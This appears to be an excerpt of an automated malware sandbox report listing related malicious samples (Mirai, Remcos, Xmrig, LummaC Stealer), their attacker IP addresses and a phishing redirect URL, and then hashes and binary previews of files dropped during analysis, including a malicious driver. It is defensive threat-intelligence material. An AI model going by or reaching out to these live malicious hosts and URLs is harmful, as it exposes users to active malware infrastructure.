	https://u48551708.ct.sendgrid.net/ls/click?upn=u001.ztPEaTmy8WofhPYJ48HDSCunUq5pm5yTGRhe-2B0bVSngC8hMYiy6PgMy1xJOG8JJZaOsK-2FG9SE7UmhEzeQSXDmEf7Z3nlXZDH-2BW1HSMP6c8uYUvXDTaJRyLbPDV6bI3nnDyIlM0OJKevMwAF04rpfLmQEYS641NQTMU227kkOtBQgQK-2FNlHeN6DpPMLDgH6kuMS3X_2vbC1nrAFjePip8HYuHYOlkYXiy7Z-2FrO9MQN7lNoEgxRkovUJGAEvKvTFyRmFsa9AQlcDpFhpJzgHajMOC0yWTZOc2DdmxhrlyPvteyXbl8nlhAtf2p-2FHw4RnlZ8cxDY-2BWJeBsszGnsrXuNOI8LpL5ZYI3ad04OdxC8tHHA5tO-2Be1xS3Z9Z3VrOTM-2FT5ptoYnx5N-2FTYKQ13RZ-2FookVMhAtJ6OV43Zayd1qOmHGLwUI8-3D	Get hash	malicious	Phisher	Browse	154.216.20.188
	Reqt 83291.vbs	Get hash	malicious	Remcos, GuLoader	Browse	154.216.18.62
	RH74mYjwoQ.elf	Get hash	malicious	Mirai	Browse	154.216.16.109
	tgCdafZIfZ.elf	Get hash	malicious	Mirai	Browse	154.216.16.109
	LiUgL2AoGI.elf	Get hash	malicious	Mirai	Browse	154.216.16.109
DAPLDATAPLANETLtdRU	file.exe	Get hash	malicious	Xmrig	Browse	37.203.243.102
	http://www.pixelpromo.ru/bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://oR.smelsgycz.ru/OP4lIHE/#Dinfo@test.uk.com	Get hash	malicious	Unknown	Browse	93.188.41.36
	file.exe	Get hash	malicious	DarkVision Rat, Xmrig	Browse	37.203.243.102
	file.exe	Get hash	malicious	DarkVision Rat, Xmrig	Browse	37.203.243.102
	lokigod.exe	Get hash	malicious	Xmrig	Browse	37.203.243.102
	xblkpfZ8Y4.exe	Get hash	malicious	Xmrig	Browse	37.203.243.102
	v859oajfVH.elf	Get hash	malicious	Unknown	Browse	37.203.242.178
	oAUrOBvfbV.elf	Get hash	malicious	Mirai	Browse	93.188.42.246
	x86_64-20220704-2102	Get hash	malicious	Mirai	Browse	93.188.42.210
	9faoC0drSo	Get hash	malicious	Mirai	Browse	93.188.42.249
OBE-EUROPEObenetworkEuropeSE	file.exe	Get hash	malicious	Amadey, Credential Flusher, DarkVision Rat, LummaC Stealer, Stealc	Browse	185.157.162.216
	file.exe	Get hash	malicious	DarkVision Rat, Xmrig	Browse	185.157.162.216
	file.exe	Get hash	malicious	Amadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, Vidar	Browse	185.157.162.216
	file.exe	Get hash	malicious	DarkVision Rat, Xmrig	Browse	185.157.162.216
	secondaryTask.vbs	Get hash	malicious	Clipboard Hijacker, MicroClip, Remcos	Browse	185.157.162.126
	Slf.msi	Get hash	malicious	Clipboard Hijacker, MicroClip, Remcos	Browse	185.157.162.126
	LauncherPred8.3.389 stablesetup.msi	Get hash	malicious	Clipboard Hijacker, MicroClip, Remcos	Browse	185.157.162.126
	la.bot.arm6.elf	Get hash	malicious	Unknown	Browse	193.183.116.8
	LauncherPred8.3.37Stablesetup.msi	Get hash	malicious	Remcos	Browse	185.157.162.126
	Slf.msi	Get hash	malicious	Remcos	Browse	185.157.162.126

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\orupcopicsyv.sys	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	5EZLEXDveC.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	6R0yrvM8Hk.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	Step 3 - Setup_Install.exe	Get hash	malicious	Xmrig	Browse
	Step 3 - Setup_Install.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	DarkVision Rat, Xmrig	Browse
	IYXE4Uz61k.exe	Get hash	malicious	DCRat, PureLog Stealer, Xmrig, zgRAT	Browse
	file.exe	Get hash	malicious	Amadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x0b2b4038, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6586184369589793
Encrypted:	false
SSDEEP:	1536:hSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:haza9v5hYe92UOHDnAPZ4PZf9h/9h
MD5:	B42230AD4A636D20D2B6FF281204A26D
SHA1:	760DEE4F827D5FF4C44C7BDE9DE12F819C0AD4C6
SHA-256:	E42FA196696FE2F630EB403C754C6B88D0FE67A14B5E9006AA21F96D06D94570
SHA-512:	9C268B0644F6E2B2084A397675419A06D0FFF389BD2DA910F0BCB36F671DB68FC14B8587CFA9C3F63A8AEF8884FFB31130C07349B73890AD671474B2981D618B
Malicious:	false
Preview:	.+@8... ...............X\...;...{......................0.z..........{...(...\|..h.\|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................Y-]<.(...\|......................(...\|...........................#......h.\|.....................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vkvea4g.ob5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5rqzx5n3.4k3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlg2bnxa.d4o.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ilo4lmtu.iq0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lshozpzm.ile.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ozywglfg.nms.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pbix5vvs.fnz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rvkekz4f.1xj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\orupcopicsyv.sys

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 5EZLEXDveC.exe, Detection: malicious, Browse Filename: 6R0yrvM8Hk.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: Step 3 - Setup_Install.exe, Detection: malicious, Browse Filename: Step 3 - Setup_Install.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: IYXE4Uz61k.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 20:40:14 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9796501385838905
Encrypted:	false
SSDEEP:	48:85ldtT1FMHzidAKZdA19ehwiZUklqeh7y+3:85l/Acy
MD5:	8D7E691BA3AAF1DC01CB40A485AC8754
SHA1:	D064DDB34FB6DA5F17C0C4977D6E3625AD956A92
SHA-256:	F2076BA6C4B34E7F65390437DC5521FBB0E84EC20812E84805D01410002F2556
SHA-512:	B8F0531D82E419CE18CA245F5EF01AA6C43477D25784BE37062217CD6AF47D3FAC76E7B7B385A4848F637394715567A1DCA47E71B0DE43D3F8588C3D882591CF
Malicious:	false
Preview:	L..................F.@.. ...$+.,....VHum.L..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 20:40:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.995187016973094
Encrypted:	false
SSDEEP:	48:8cCldtT1FMHzidAKZdA1weh/iZUkAQkqehMy+2:8/l/69Q9y
MD5:	240CA445107E69A5BFA80F51F92277B7
SHA1:	13A5445579C28E4B8AE8BFC1F6BD4707F61038DF
SHA-256:	6E015056F8954791665A18EDA538BF1A960577291514153526C97E1469B9006B
SHA-512:	15125A0FF626F7D29E49AF559A53CF05F6E3B30CBA7F34F349741A021778E4793AEFEBE76ECFF8851DC8D1638E262B837BE6DC58D6F2A8459EEC2A228A55BB93
Malicious:	false
Preview:	L..................F.@.. ...$+.,......fm.L..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.009827496706631
Encrypted:	false
SSDEEP:	48:8xuldtT1FsHzidAKZdA14tseh7sFiZUkmgqeh7suy+BX:8xul/CnAy
MD5:	147870385DE79B2EF1B9E1CB261F7EF3
SHA1:	B00AF886028B5DF726D85A95DF8D2F8BB11B07FB
SHA-256:	BDE22ECCAEE433450509B9852C6EDE5E71CF601702271D0B07FD7BCD978EC280
SHA-512:	BC6B8B427550AC390DE21F2C2E3714E54D6DE925B94E7ACF27077455C03D549CAA38380B23AC529537EFE9D1945662E6AEDE557E16E51E0FEEA864C2070794CB
Malicious:	false
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 20:40:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.994478807295877
Encrypted:	false
SSDEEP:	48:8gldtT1FMHzidAKZdA1vehDiZUkwqehYy+R:8gl/hmy
MD5:	AB1C2419854BF6DA62DD6AF60D18B915
SHA1:	E90F123B28E58A3BE0B8853ABA1298A1928B5A35
SHA-256:	2295E21892094647E2F547C21DEAAE4215F33523EB994F1BAEC4EAE91B6A1BEA
SHA-512:	974A0FC26ECFD5D1B01B685CEA06FC74B6B22D06B28081EB5979819B5043AFE0F98CF805A56F3AF9117728A5F45433F59D211443BCBA00CE36AB7845AE58BEEB
Malicious:	false
Preview:	L..................F.@.. ...$+.,......`m.L..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 20:40:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.983863301945611
Encrypted:	false
SSDEEP:	48:8WldtT1FMHzidAKZdA1hehBiZUk1W1qehyy+C:8Wl/h9Sy
MD5:	0531D9818C8FED3E4A45D8F7046D2608
SHA1:	6DC307C236CC816D4041A032111D6410790E3251
SHA-256:	BC39F22B34170190FB5B849A3ECDAD2F1F7B40AA2CD232E99423BF7B1E3B8DB4
SHA-512:	F9978CAEB889B40DF3D787987298F28BFD7E74F75CAC3907A648825F9288A98BFB929A86D839113A374E2BC08AB8577DDF49C55970866CBF2C3E1D07EB32B8DC
Malicious:	false
Preview:	L..................F.@.. ...$+.,....7#nm.L..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 20:40:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.993471746714065
Encrypted:	false
SSDEEP:	48:8CldtT1FMHzidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbAy+yT+:8Cl/dT/TbxWOvTbAy7T
MD5:	AE3E46A66E9A826212E9E40710C72BA8
SHA1:	7F8ABBFC2CD9B437A2E394F5BACCCE0516847D7A
SHA-256:	71A3B0E056A68DB69758C262D70A2547F8647A5A60445A189D00DFF65FC6A076
SHA-512:	23FED288580D1A8D49F78582217A6BF723E78729DDE318B8B3CACC0B8DBA2852CA90062DE9927429DC667D7F11475C23442A37A1841D029AA00A73199529036D
Malicious:	false
Preview:	L..................F.@.. ...$+.,....f.Um.L..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\WindosCPUsystem.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5879808
Entropy (8bit):	7.987285457182454
Encrypted:	false
SSDEEP:	98304:vWTonxCNn6gLXEg4/x4W9lLgHegHULFVH7gYhWhrnYHp:uTYsLX8x9N4egO37g5hrn
MD5:	60BC4894D78BA3F2EF9AA66486AAD79E
SHA1:	255EA77A0B211D3A1296E908E2C5D3D10B048D1B
